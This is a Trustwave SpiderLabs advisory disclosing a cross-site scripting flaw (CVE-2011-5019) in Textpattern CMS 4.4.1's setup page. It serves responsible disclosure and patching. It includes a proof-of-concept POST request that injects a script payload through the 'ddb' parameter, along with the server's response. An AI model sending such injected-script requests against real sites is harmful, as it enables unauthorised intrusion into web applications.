Trustwave's SpiderLabs Security Advisory TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System Published: 1/03/12 Version: 1.0 Vendor: Textpattern (http://textpattern.com/) Product: Textpattern Version affected: 4.4.1 before change set 3612 Product description: Textpattern is an open source content management system originally developed by Dean Allen. While it is often listed among weblogging tools, its aim is to be a general-purpose content management system suitable for deployment in many contexts. Textpattern is written in PHP using a MySQL database backend. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: Cross-Site Scripting Vulnerability CVE: CVE-2011-5019 After extracting the Textpattern source files on to a web server, but before the application is fully installed, cross-site scripting vulnerabilities are present in the '/textpattern/setup/index.php' page. Example(s): Performing XSS on "ddb" parameter #Request POST /textpattern/setup/index.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/textpattern/setup/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 156 duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2 Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print Config #Response HTTP/1.1 200 OK Date: Sat, 10 Dec 2011 02:46:44 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.2 Content-Length: 674 Connection: close Content-Type: text/html; charset=utf-8 <--------snip------>

Checking database connection

Connected

Database does not exist or your specified user does not have permission to access it.

Remediation Steps: Textpattern change set 3612 includes a fix for this security issue. Upgrade to the latest version. Revision History: 12/23/11 - Vulnerability disclosed 12/23/11 - Patch released by vendor 1/03/12 - Advisory published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.